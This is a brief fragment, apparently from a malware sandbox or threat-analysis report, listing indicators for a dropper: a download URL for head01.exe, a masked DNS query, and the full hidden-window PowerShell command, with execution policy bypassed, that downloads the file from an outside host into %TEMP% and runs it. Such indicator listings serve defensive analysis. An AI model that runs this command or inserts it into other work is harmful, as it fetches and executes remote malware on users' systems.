Technical Information
- http://stocktonblue.com/mik01/head01.exe as %temp%\head01.exe
- DNS ASK st####onblue.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://stocktonblue.com/mik01/head01.exe','%TEMP%\head01.exe'); Start-Process('%TEMP%\head01.exe')' (with hidden window)